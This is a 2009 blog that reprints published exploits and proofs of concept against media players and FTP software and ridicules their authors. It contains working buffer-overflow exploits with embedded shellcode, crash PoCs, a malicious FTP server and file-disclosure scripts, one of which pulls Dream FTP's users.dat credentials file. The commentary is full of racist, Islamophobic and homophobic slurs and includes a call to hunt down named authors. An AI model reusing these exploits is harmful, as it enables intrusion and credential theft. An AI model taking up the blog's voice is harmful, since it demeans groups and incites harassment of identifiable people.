Exploit Critics

THE GOBLIN STRIKES BACK

2009-08-11T14:13:00.000-07:00

SHIT! SHIT!

The Nut Goblin (ThE g0bL!N) has to be the most retarded of the retards we've fucked with on this blog. He is very stupid. Some say he has a negative IQ. Some say he (or she?? once again) has nuts on his/her forehead at all times. But all know what a dumb mother fucking idiot The Nut Goblin really is.

PUNT! PUNT!

Exhibit A-Z:

A perfectly normal exploit.. almost ruined!


#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
###################################################################
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
###################################################################

Perfectly fine. JMP to mother fucking code. Now, The cum gobliner has to gay it all up with...

#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav)  local  Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################

Even the fags at milw0rm got it wrong...

"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)" --> ITS NOT SEH FUCKUP.

You see a fucking JMP 0xXX anywhere? Debug something every once in a fucking blue moon moron.

So, milw0rm is dumb and the goblin gobbles str0ke's nuts, and they both claim it as SEH we assume ahahahahahahaahhahaa!!!!

A DOUBLE ACTION FEATURE FROM THE GOBLIN

2009-07-11T13:30:00.000-07:00

Main Critism: Do I even have to analyse this shit? IT IS SHIT, YOU CAN SEE THAT.

I will refer to we and I and I as we.


 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   M3U/M3L to ASX/WPL v1.1  (asx,m3u,m3l) Local Stack Overflow POC          ##
# #  Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html             ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');#asx,m3u,m3l)
print myfile $crash;
##################################################################################
#By ThE g0bL!N
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]

watttttttttttttttttttttttttttttttttt??????????????????


 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   Playlistmaker v1.5   (.M3U/M3L/Txt File) Local Stack Overflow POC        ##
# #  Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html        ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]

Now that your eye balls are offically bleeeeeeeeeding.. its time to take a time out.

Gobble on dese ballz goblin!

Go hunt down these idiots. I'm no fucking racists, but lets burn the towels on their heads. Everybody knows the muslim script kiddies are even worst than the .ro fags now.

We are now calling on the toothless bitches that these yellow shitting asswipes call their mothers to spank them and ground them from teh interwebz for at least 60 days. During the 60 day period, interwebz access will be restricted to emailing their favorite rappers and compiling exploits remotely via GCC_SERVER. Nothing will stop these dumbasses as we can tell, so theres nothing stopping us from blogging about the dumb shit that they do. Rely on ignorance, spread intelligence.

BRING BACK MITNICK!!!

OtsAv TV [.olf] Local Heap Overflow Poc

2009-07-10T08:50:00.000-07:00

Main Critism: Ok, I'm only gonna post 1/3 "Heap Overflow PoCs".. trust in us, the rest are just as gay.


#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
---------------------

Wow, that a total retard. "UMMM let meee post dis shiz un seee f s0m3b0dy cun XPLOIT it fer me!!!" --> Really, is that the login you want owning your servers? Is that the kind of moron you listen to but can't understand when you call major technical support hotlines? Will somebody pleaseeee shave this girl's head and sell her back to pre-school or towelhead/dish rag/mop bucket/broom head/microshit education institutes? WOAHHHHHHHHHHHHHH LIKE YEAH D00DZ

PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

2009-07-10T08:47:00.000-07:00

Main critism: You stupid kiddie fucks just won't give up. I hate you more than the new milw0rm owners. Since when is Citrix bug a web bug??


#!/usr/bin/perl
#
#
#
# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....
#
#
#EAX 41414141
#ECX 00000000
#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBX 00B928DC
#ESP 0012FD2C
#EBP 0012FD78
#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 004EEA78 PatPlaye.004EEA78
#EIP 00404C59 PatPlaye.00404C59
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 2480; # Random

open(MYFILE,'>>cyber.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

Paaaaaaaaaaaaaaaathetic.

PS. Cyber-Zone nicknamed himself that when he got "In Da Zone" when Cybering with an alaskan huskie. Go figure.

More Lame Shit To Have A Go At

2009-07-01T15:47:00.000-07:00

Incase you thought we were dead.. or finished.. you thought wrong. We thought wrong. A job done well is never finished we suppose.. and we're back because so goat humping queer decided to jack up some more perl exploit bullshit... yeah, we'd love for a llama to fart on his face too.


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##
# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)

h4rh4rh4r Boom !!! like lulz like it crashed my blue screen lulz

DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

2009-05-14T10:12:00.001-07:00

Main critism: SINCE WHEN DID A FUCKING CRASH BECOME A SECURITY BUG?


#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

#####################################################################################################
#                    DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3l";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

Somebody obviously gave this bitch turrets when she was too young. She plays with dolls and playlists all day long. I speak for all Canadians by saying, "GO FUCK YOURSELF"

CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit

2009-05-12T23:58:00.000-07:00

Main critism: (*DN9ysysy7F&*SSFSKK8990ol;lIO89980`*BANGS HEAD ON KEYBOARD*89&*n7``jnsdfd8u9d89udsf83ffdfd***BREAKS KEYBOARD***


#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
$junk = "\x41" x 26369;
$eip="\x7D\xBC\x01\x10"; # Universal
$nopsled = "\x90" x 10;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
open(zax,">>zAx.pls");
print zax $header.$junk.$eip.$nopsled.$shellcode;
print "[+] Done !! [+]";
close(zax);

You cum guzzling metasploit ripping faggots! You probably don't even know the difference between INTEL and POWERPC chips! I HOPE MICROSHIT ADDS REAL BUFFER OVERFLOW PROTECTION JUST SO I DONT HAVE TO SLIT MY WRISTS EVERYTIME I SEE YOUR LAME TRIAL AND ERROR BULLSHIT EXPLOITS ON MILH0USE!

NO NO NO THAT STILL WONT HELP, THEN YOU'LL JUST NEVER UPGRADE AND PUT DISCLAIMERS ON THE LAME FUCKING EXPLOITS LIKE "hey im musLIM this only workZ ON WINDOWS XP SP3 NOT 4 OR 5 OR 6 OR 7 OR 8 BECAUSE IM TOO FUCKING STUPID AND I RUIN EVERYTHING MY MOTHER FUCKED A GOAT YEAH SHE DID I FUCKED MY BROTHER AND SISTER IM A FUCKHEAD ARG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" Or something of that fucking nature bitchass towelheadZ!!!

Mereo 1.8.0 Arbitrary File Disclosure Exploit

2009-05-12T23:57:00.000-07:00

Main critism: HOLY SHIT MAW NOW IM A HACKER!@#


#!/usr/bin/perl -w
#
# Found By : Cyber-Zone (ABDELKHALEK)
# Paradis_des_fous@hotmail.fr
#
#
# Note : Don't use this for your own R!sk :d
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers

#
# demo version Tested under my MS WINDOWS sp2
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tMereo 1.8.0 Arbitrary File Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 4)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port File\n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini\n";
}
($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("Loading ........................................\n\n\n");

$temp="/";
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
if($Disclosure){
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");
print("SEE U $HackerName\n\n\n");
}
else
{
print(" Not Found !!!\n\n");
exit;
}

Y!s ho!y sh!t you lame fuckhead.. I bet your mother fucked a goat and had you, right?

Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit

2009-05-05T20:14:00.000-07:00

Main critism: This fucking idiot just won't quit. QUIT FAGGOT, YOU SUCK!


#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS
#
# FIGUIG OwnZ !!!
#
# Streaming Audio Player 0.9  (.M3U File) Local Buffer Overflow PoC
#
#Olly Registers
#EAX 00197D20
#ECX 0000020E
#EDX 00126F84
#EBX 00193DAF
#ESP 001270B8
#EBP 7C81391C kernel32.GetFullPathNameA
#ESI 00197D20
#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 41414141
#
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 509;
open(MYFILE,'>>buffer.m3u');
print MYFILE $Header.$ex;
close(MYFILE);

LEARN TO WRITE A REAL FUCKING EXPLOIT YOU PROOF OF SHIT!

32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC

2009-05-05T20:06:00.000-07:00

Main critism: Do these fuckups circle jerk until one of them comes up with the most idiotic name possible?


#! /usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the  client to crash by sending it a large banner.
#  By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0         nv up ei pl nz na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
#41414141 ??              ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
                   'Proto' => 'tcp',
                   'Listen' => SOMAXCONN)
    or die "Can't create socket ($!)\n";
   
print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
    print "send> data.\n";
    print $client $data;
}
die "Can't accept socket ($!)\n";

And the weiner is... Load 99%, who posted a lame EIP FUCKING OVERWRITE PROOF OF CONCEPT exploit for some no-name loser ftp client. What, the, fuck.

Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit

2009-04-23T16:10:00.000-07:00

Main critism: OH FUCK /me goes to turn off my shitty ass dream ftp server running on winblowz 3.11


#!/usr/bin/perl -w
#
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#################################################################################################################################
#23/04/2009 13:20:25  FTP Server started on port 80.
#23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220  
#23/04/2009 13:25:43  [0000000002] USER anonymous
#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43  [0000000002] PASS **********
#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43  [0000000002] PWD
#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43  [0000000002] TYPE I
#23/04/2009 13:25:43  [0000000002] 200 Type set to I
#23/04/2009 13:25:43  [0000000002] CWD Program Files
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43  [0000000002] CWD BolinTech
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43  [0000000002] MDTM users.dat
#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43  [0000000002] PASV
#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43  [0000000002] RETR users.dat
#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43  [0000000002] 226 Transfer complete
#23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.
#################################################################################################################################
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
#################################################################################################################################
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
#################################################################################################################################
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
#################################################################################################################################
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";
}
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$target2="BolinTech";
$target3="users.dat";
$slash="/";
$TargetFile=$terget1.$slash.$target2.$slash.$target3;
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
sleep(15);
print("Exploiting ..........|Done!\n");
sleep(5);
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print(".........................EOF.......................\n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");

Seriously, write a proper exploit you lame ass.

CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit

2009-04-23T16:06:00.000-07:00

Main critism: WHAT IN THE NAME OF COCK SUCKING ALLAH MUHAMMAD SHIT FACE IS WITH FAGGOTS WRITING 9834894389284 EXPLOITS FOR ONE OR TWO SHITTY BUGS!?


# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# By Stack Sysworm.com
# Note abouts this Exploit : right click >> Option >> Open >> select our target file and boooooom calc executed :d
# Note abouts the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didin't be the same for my sweety freind His0ka
# When i test He's exploit it didin't work and the ret adress be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box
# Thnx for all freind ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......
# Thnx for the great str0ke thnx for your support :d
chars = "\x41" * 1504
eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x56\x4b\x38\x42\x54\x42\x43\x45\x58\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x44\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x56\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"
